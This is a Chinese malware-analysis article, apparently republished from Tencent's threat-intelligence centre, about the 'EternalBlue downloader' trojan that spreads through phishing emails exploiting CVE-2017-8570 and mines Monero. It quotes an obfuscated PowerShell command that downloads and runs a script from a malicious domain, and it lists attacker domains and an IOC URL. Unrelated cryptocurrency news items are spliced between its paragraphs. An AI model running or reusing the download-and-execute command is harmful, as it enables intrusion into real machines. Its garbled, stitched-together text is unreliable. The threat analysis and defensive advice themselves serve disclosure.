“永恒之蓝下载器木马”新增钓鱼邮件传播，利用用户机器挖矿门罗币

来源：腾讯御见威胁情报中心

编者注：原标题为《“永恒之蓝下载器木马”新增钓鱼邮件传播，附件含CVE-2017-8570漏洞攻击代码》

“永恒之蓝”下载器木马在感染用户机器上运行后，会自动当前用户的邮箱通讯录并发送附件为urgent.doc的文档，该文档附带CVE-2017-8570漏洞攻击代码。

Clearpool已完成其机构借贷平台Clearpool Prime的开发:4月4日消息，据官方博客，去中心化借贷协议Clearpool宣布已完成其机构借贷平台Clearpool Prime的开发，测试网版本已向用户开放。此外，Securitize iD已被选为Clearpool Prime的官方KYB提供商，客户入职流程已经开始，预计未来几周将提供第一笔贷款。

此前2月7日消息，Clearpool发布2023年路线图目标，计划在今年第一季度推出非托管机构借贷平台Clearpool Prime。2月13日消息，Clearpool选择在Polygon网络上部署其机构借贷平台Clearpool Prime。[2023/4/4 13:43:45]

如果被攻击用户收到邮件并不慎打开文档，就可能触发漏洞执行Powershell命令下载mail.jsp：

DeGods开放向以太坊网络的迁移，以太坊上DeGods将收取0.33%的版税:4月1日消息，Solana 生态 PFP 项目 DeGods 已向 DeGods NFT 持有者开放向以太坊网络的迁移，DeGods 将在前 24 小时内支付迁移 Gas 费用。在前 48 小时内，DeGods 将免除 ETH 上的 DUST 质押 / 取消质押费用。另外，4 月 3 日起，Paper Hands Bridge Tax 将开始生效。Solana 上所有剩余的 DeGods 和 y00ts 将更新为强制收取 33.3% 的版税。t00bs 将保留在 Solana 上，并收取 3.33% 的版税。以太坊上的 DeGods 将收取 0.33% 的版税。[2023/4/1 13:39:18]

C:/Windows/System32/cmd.exe/cpowershellIE`x(Ne`w-Obj`ectNet.WebC`lient).DownLoadString(http://ap35nf7.jp/mail.jsp?Administrator*OUHH1)

Web3信息分发协议RSS3 2022年处理数据请求超过14亿次:1月9日消息，Web3信息分发协议RSS3在其社区公开信中表示，RSS3网络在2022年处理超过14亿次数据请求，其中12月的月度请求超过4亿次，同比增长200倍。RSS3计划在生态系统中推出全球范围的OpenWeb搜索引擎，通过充分去中心化的技术对它们进行标准化和分发，以平衡覆盖范围、效率和隐私。RSS3将发布代币经济改革的提案，如果获得社区批准，API的使用将引起代币通缩。[2023/1/10 11:03:01]

而下载使用的域名ap35nf7.jp实际上并没有注册，但是依然能够解析到地址：t.awcna.com，是因为被感染机器的本地hosts文件被篡改，使得随机生成的域名映射到木马使用的恶意地址，细节请参考御见威胁情报中心此前发布的报告：《“永恒之蓝下载器”木马篡改hosts指向随机域名，再用多个漏洞攻击内网挖矿》。

本次攻击过程中，木马将使用随机生成的字符加“.cn”或”.jp“或”.kr“后缀作为DGA域名，并在hosts文件中指向域名：

t.tr2q.com,t.awcna.com,t.amynx.com

mail.jsp经过高度混淆，多次解密后可以看到其安装多个计划任务下载Powershell脚本执行，并使用了新的计划任务名：

“Bluetea“蓝茶。

“永恒之蓝”下载器木马自出现之后从未停止更新，从最初的PE样本攻击到后来转移为以Powershell无文件攻击方式躲避查杀，并且通过安装多个类型的计划任务进行持久化。在传播方式上，最初通过供应链攻击积累一批感染机器后，又不断利用”永恒之蓝”漏洞，MSSql爆破，$IPC爆破，RDP爆破等方法进行扩散传播，近期又增加了DGA域名攻击和钓鱼邮件攻击，其最终目的只为利用用户机器挖矿门罗币获利。

永恒之蓝下载器木马的历次版本更新参考下表：

安全建议

1.建议用户不要轻易打开不明来源的邮件附件，对于邮件附件中的文件要格外谨慎运行，如发现有脚本或其他可执行文件可先使用杀软件进行扫描；

2.服务器使用安全的密码策略，特别是IPC$、MSSQL、RDP账号密码，切勿使用弱口令，避免遭遇弱密码爆破攻击；

3.根据微软安全公告及时修复Office漏洞CVE-2017-8570，需进行漏洞扫描和修复，或采用WindowsUpdate进行。

IOCs

http//t.awcna.com/mail.jsp

郑重声明： 本文版权归原作者所有， 转载文章仅为传播更多信息之目的， 如作者信息标记有误， 请第一时间联系我们修改或删除， 多谢。